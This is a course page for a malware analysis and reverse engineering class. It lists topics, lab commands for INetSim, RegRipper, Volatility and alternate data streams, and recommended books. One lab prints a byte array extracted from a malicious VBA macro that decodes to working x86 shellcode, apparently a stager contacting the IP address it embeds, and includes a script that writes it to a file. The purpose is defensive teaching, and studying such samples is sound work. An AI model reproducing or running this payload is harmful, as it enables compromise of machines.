Malware Analysis and Reverse Engineering (IAM301/IAM302)

• Topic 1: Introduction

• Topic 2: Fundamentals of malware analysis

• Topic 3: Malware classification

• Topic 4: Examining AV signature

• Topic 5: Customizing AV database

• Topic 6: MA sandboxes

• Topic 7: AV scanners

• Topic 8: Review & progress test

• Topic 9: Malware Lab Integrity

• Topic 10: Recipe Manipulating HTTP/HTTPS

• Topic 11: Cloning and imaging disks

• Topic 12: Dynamic analysis tools

• Topic 13: Malware forensics

• Topic 14: Identifying packers

• Topic 15: Registry forensics

• Topic 16: Case studies

• Topic 17: Malware debugging

• Topic 18: JIT debugger for shellcode analysis

• Topic 19: Memory forensics

• Topic 20: Course Review

Labs

Config inetsim.conf

• #service_bind_address 10.10.10.1 → service_bind_address 0.0.0.0
• #dns_default_ip 10.10.10.1 → dns_default_ip 192.168.56.105
• Note: remember to restart the inetsim service after editing as above

Decode the dumping file to a executable file

#!/share/local/bin/python
data2 = b''
dumpfile = open("dump3")
data = dumpfile.read()
data2 = data.split(",")
dumpfile.close()
finalfile = open("final_file.bin", "wb")
for i in range(len(data2)):
        finalfile.write(bytes(chr(int(data2[i])).encode('latin')))
finalfile.close()

Converting the VBA array into a Python list

import struct

myList = [-4, -24, -119, 0, 0, 0, 96, -119, -27, 49, -46, 100, -117, 82, 48, -117, 82, 12, -117, 82, 20, -117, 114, 40, 15, -73, 74, 38, 49, -1, 49, -64, -84, 60, 97, 124, 2, 44, 32, -63, -49, 13, 1, -57, -30, -16, 82, 87, -117, 82, 16, -117, 66, 60, 1, -48, -117, 64, 120, -123, -64, 116, 74, 1, -48, 80, -117, 72, 24, -117, 88, 32, 1, -45, -29, 60, 73, -117, 52, -117, 1, -42, 49, -1, 49, -64, -84, -63, -49, 13, 1, -57, 56, -32, 117, -12, 3, 125, -8, 59, 125, 36, 117, -30, 88, -117, 88, 36, 1, -45, 102, -117, 12, 75, -117, 88, 28, 1, -45, -117, 4, -117, 1, -48, -119, 68, 36, 36, 91, 91, 97, 89, 90, 81, -1, -32, 88, 95, 90, -117, 18, -21, -122, 93, 104, 110, 101, 116, 0, 104, 119, 105, 110, 105, 84, 104, 76, 119, 38, 7, -1, -43, 49, -1, 87, 87, 87, 87, 87, 104, 58, 86, 121, -89, -1, -43, -23, -124, 0, 0, 0, 91, 49, -55, 81, 81, 106, 3, 81, 81, 104, 74, 29, 0, 0, 83, 80, 104, 87, -119, -97, -58, -1, -43, -21, 112, 91, 49, -46, 82, 104, 0, 2, 64, -124, 82, 82, 82, 83, 82, 80, 104, -21, 85, 46, 59, -1, -43, -119, -58, -125, -61, 80, 49, -1, 87, 87, 106, -1, 83, 86, 104, 45, 6, 24, 123, -1, -43, -123, -64, 15, -124, -61, 1, 0, 0, 49, -1, -123, -10, 116, 4, -119, -7, -21, 9, 104, -86, -59, -30, 93, -1, -43, -119, -63, 104, 69, 33, 94, 49, -1, -43, 49, -1, 87, 106, 7, 81, 86, 80, 104, -73, 87, -32, 11, -1, -43, -65, 0, 47, 0, 0, 57, -57, 116, -73, 49, -1, -23, -111, 1, 0, 0, -23, -55, 1, 0, 0, -24, -117, -1, -1, -1, 47, 116, 97, 79, 56, 0, -21, 16, 49, -71, -117, 51, 127, -117, -33, 54, 31, -69, -19, 48, 21, -37, -56, -107, -59, 23, -88, -63, 0, -104, -116, -51, -104, 65, -48, -118, -80, 62, 123, -103, -51, -124, -11, -27, 50, 17, -77, -115, 98, 29, 106, -71, -108, 35, 99, -94, 70, 89, -41, 14, -9, 114, -126, -101, -95, -16, -75, 44, 28, 59, -70, 123, -27, 55, 63, -86, 8, 66, -3, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 52, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, 83, 73, 69, 32, 55, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 48, 41, 13, 10, 0, 62, 73, 5, 8, -70, 26, -68, 95, 117, -58, -111, -107, 21, 47, -40, -43, 89, 118, 112, -18, 17, 116, -104, 95, 44, -45, -100, -125, 106, 75, -7, -57, 92, -90, -44, -128, -53, 22, -20, 101, 119, -65, -69, -87, 29, 90, 118, 66, 24, 20, -60, 86, -86, -69, 89, 56, 15, 74, 78, 113, 44, 73, -16, -52, -119, 13, 5, -24, -71, -64, 127, -79, -61, -126, -53, -105, -7, 76, -108, -60, -75, 41, -101, -61, -14, -10, 65, 120, -70, -117, -120, 55, -110, 51, 94, -73, -52, 82, -66, 10, -103, -105, -92, 32, -44, 8, -88, 126, 14, 75, -29, -72, -19, -87, 5, -61, 7, -109, -41, 23, -91, -116, 41, 24, -84, -47, 6, -99, 110, -117, 78, -47, 1, -112, -55, 29, 110, 32, 30, -83, 107, -101, 65, 111, -73, 113, -100, 64, -117, -103, -117, -30, 73, 102, 66, 76, -3, -51, 56, -66, -33, -73, -2, -5, -116, 17, 71, 75, 39, 61, 69, -44, 48, 5, -28, 108, -42, -58, -116, -5, 112, 42, -91, -69, 30, -90, 46, -20, -50, -18, -37, -54, -125, -27, 90, 30, 106, 62, -73, -88, 102, -113, 105, 116, 96, -101, 73, -9, -15, -8, 20, -125, -63, -7, 15, -124, 49, 6, -61, -87, 24, -84, 72, -113, 38, 32, 0, -30, 5, 124, 52, 18, -99, 46, 11, 56, -9, -14, 0, 104, -16, -75, -94, 86, -1, -43, 106, 64, 104, 0, 16, 0, 0, 104, 0, 0, 64, 0, 87, 104, 88, -92, 83, -27, -1, -43, -109, -71, 0, 0, 0, 0, 1, -39, 81, 83, -119, -25, 87, 104, 0, 32, 0, 0, 83, 86, 104, 18, -106, -119, -30, -1, -43, -123, -64, 116, -58, -117, 7, 1, -61, -123, -64, 117, -27, 88, -61, -24, -87, -3, -1, -1, 52, 55, 46, 57, 51, 46, 54, 51, 46, 49, 55, 57, 0, 18, 52, 86, 120]

shell_code = open("shellcode.bin", "wb")
for i in myList :
	shell_code.write(struct.pack('b', i))
shell_code.close()

Install FOG server

• https://docs.fogproject.org/en/latest/installation/server/install-fog-server/
• Reset WebUI FOG password
  • If the root user in MySQL does not have a password (or it’s stored in ~/.my.cnf): sudo mysql -u root fog
  • If the root user in MySQL does have a password: sudo mysql -u root -p fog
  • Run this query to reset the password: UPDATE users SET uPass = MD5('password') WHERE uName = 'fog'; exit;

Capturing packets with Tshark via Python

Python 2.7.18 (default, Jul  1 2022, 10:30:50) 
[GCC 11.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from analysis import TShark
>>> cap = TShark("/tmp/mu.pcap")
>>> cap.start("enp0s3","10.0.2.15")
>>> Running as user "root" and group "root". This could be dangerous.
Capturing on 'enp0s3'
 ** (tshark:4588) 15:59:30.271227 [Main MESSAGE] -- Capture started.
 ** (tshark:4588) 15:59:30.271861 [Main MESSAGE] -- File: "/tmp/mu.pcap"
22 
>>> cap.stop()
>>> print cap.read()
>>> quit()

Output:

[REMOVED]
===================================================================
IP Addresses     value     rate          percent
-------------------------------------------------------------------
192.168.1.141      90       0.014359     100.00%
8.8.8.8            40       0.006382     44.44%
91.189.90.40       12       0.001915     13.33%
63.245.209.93      10       0.001595     11.11%
96.17.106.105      28       0.004467     31.11%
[REMOVED]

Discovering alternative data streams with TSK

• Create an ads: echo "this is a message" > host.txt:stream, or: notepad host.txt:stream
• Read or modify the streame:
  • notepad host.txt:stream
  • more < host.txt:stream
  • dir /R
  • streams64 host.txt (the Sysinternals Streams utility)
• PowerShell 3.0, which includes six cmdlets to directly manipulate content for ADS
  • Finding: Get-Item .\host.txt -stream *
  • Reading: Get-Item .\host.txt | Get-Content -Stream stream
  • Reference: Friday Fun with PowerShell and Alternate Data Streams

Registry Forensics with RegRipper plug-ins

• Here’s a list of the registry hives present in almost all Windows systems:
  • HKEY_CURRENT_CONFIG: supported by the System, System.alt, System.log, and System.sav files
  • HKEY_CURRENT_USER: supported by the Ntuser.dat and Ntuser.dat.log files
  • HKEY_LOCAL_MACHINE\SAM: supported by the Sam, Sam.log, and Sam.sav files
  • HKEY_LOCAL_MACHINE\Security: supported by the Security, Security.log, and Security.sav files
  • HKEY_LOCAL_MACHINE\Software: supported by the Software, Software.log, and Software.sav files
  • HKEY_LOCAL_MACHINE\System: supported by the System, System.alt, System.log, and System.sav files
  • HKEY_USERS\.DEFAULT: supported by the Default, Default.log, and Default.sav files
• In digital forensics, these registry hives can tell investigators:
  • HKEY_CURRENT_CONFIG: acts as a pointer or shortcut to a registry key containing information about the computer’s hardware profile
  • HKEY_CURRENT_USER: contains the computer settings the current user prefers (e.g., what software he/she typically uses)
  • HKEY_LOCAL_MACHINE\SAM: contains local user account and local group membership information, including passwords. It also tells you what privileges are granted (e.g., what files they can access) to each user and group in the Active Directory
  • HKEY_LOCAL_MACHINE\Security: contains local system security policy settings that control which domains are trusted to authenticate login attempts, which users are allowed to access the system, on what channels users are permitted to access the system, which privileges are assigned to a user, how users are audited, and login information for cached domain and service logins
  • HKEY_LOCAL_MACHINE\Software: contains most of the configuration information for the software installed on the computer and the OS
  • HKEY_LOCAL_MACHINE\System: contains the same information as HKEY_LOCAL_MACHINE\Software
  • HKEY_USERS\.DEFAULT: contains the registry settings used as the default for the currently logged-in user. If that user doesn’t have an existing profile, the C:\Users\Default\ntuser registry hive will get called
• Windows Registry Forensics
  • Determining installed product information: perl rip.pl -r software -p product
  • Determining the product type: perl rip.pl -r system -p producttype
  • Determining the Windows version: perl rip.pl -r software -p winver
  • Determining the network cards used: perl rip.pl -r software -p networkcards
  • Determining the DHCP information: perl rip.pl -r system -p nic
  • Determining the wireless access points information: perl rip.pl -r software -p ssid
  • Determining the shutdown time: perl rip.pl -r system -p shutdown
  • Determining the time zone: perl rip.pl -r system -p timezone
  • Determining all installed applications: perl rip.pl -r software -p uninstall
  • Determining user SIDs: perl rip.pl -r software -p profilelist
  • Determining the recent documents used: perl rip.pl -r NTUSER.DAT -p recentdocs
  • Extracting information from the winlogon key: perl rip.pl -r software -p winlogon
  • Determining suspect’s web-browsing history: perl rip.pl -r NTUSER.DAT -p typedurls
  • Collecting information about unread emails: perl rip.pl -r NTUSER.DAT -p unreadmail
  • Determining applications set to auto start: perl rip.pl -r NTUSER.DAT -p user_run
  • Determining the value of the userinit registry key: perl rip.pl -r software -p userinit
  • Determining the user’s printers: perl rip.pl -r NTUSER.DAT -p printers
  • Collecting information about Cain & Able: perl rip.pl -r NTUSER.DAT -p cain

Install volatility on CentOS 7

• Download: https://forensics.cert.org/cert-forensics-tools-release-el7.rpm
• Run following commands:
  • yum install epel-release.noarch
  • rpm -Uvh cert-forensics-tools-release-el7.rpm
  • yum --enablerepo=forensics install Volatility
  • yum --enablerepo=forensics install Volatility
• Check: volatility -h

Memory dump & analysis tools

• Image Information: volatility imageinfo -f memdump.mem
• Running Processes: volatility pslist --profile=Win2008SP1x86 -f memdump.mem
• Console Commands: volatility consoles --profile=Win2008SP1x86 -f memdump.mem
• Services: volatility svcscan --profile=Win2008SP1x86 -f memdump.mem
• Network Connections: volatility netscan --profile=Win2008SP1x86 -f memdump.mem
• Registry Hives: volatility hivelist --profile=Win2008SP1x86 -f memdump.mem
  • Virtual addresses of the SAM and SYSTEM hives: 0x89c33450 and 0x86226008
• Password Hashes: volatility hashdump --profile=Win2008SP1x86 -f memdump.mem -y 0x86226008 -s 0x89c33450 (Free Password Hash Cracker)

Book

• James Aquilina, Cameron Malin, Eoghan Casey. Malware Forensics: Investigating and Analyzing Malicious Code, Syngress Publing © 2008.
• Michael Hale Ligh, Steven Adair, Blake Hartstein, and Matthew Richard, Malware Analyst’s Cookbook and DVD: Tools and Techniques for Fighting Malicious Code, Wiley Publishing © 2011 (ISBN: 978-0470613030).
• Michael Sikorski, Andrew Honig. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software, No Starch Press © ISBN: 978-1-59327-290-6, 2012.

URLs

• 7-Zip: a file archiver with a high compression ratio
• Autopsy®
• Easy_CrackMe
• eicar.com.txt (malicious code sample)
• Faronics_DFS
• Malware test files: PE, APK, MacOSX, ELF
• MoonSols: Windows Memory Toolkit
• Nmap (“Network Mapper”)
• OllyDbg v1.10
• PE iDentifier v0.95 (2008.11.03)
• Practical Malware Analysis Labs
• Process Monitor v3.96 (03/09/2023)
• RegRipper v2.8
• Streams v1.6 (03/24/2021)
• UPX 4.2.2 (2024.01.04)
• Windows sample memory dump

Course Implementation Plan (old version)

• Session 1: Course Overview
• Session 2: Overview of Malware and Malware Analysis
• Session 3: Basic Dynamic Analysis
• Session 4: Basic Static Technique
• Session 5: Assembly Language Overview
• Session 6: IDA Pro
• Session 7: Analyzing Malicious Windows Programs
• Session 8: Windows Internal and API
• Session 9: Debugging
• Session 10: Malware Analysis with OllyDbg and Windbg
• Session 11: Kernel Debugging with Windbg
• Session 12: Malware Behaviour and Mechanism
• Session 13: Convert Malware Launching
• Session 14: Malware stealth technique
• Session 15: Mobile Malware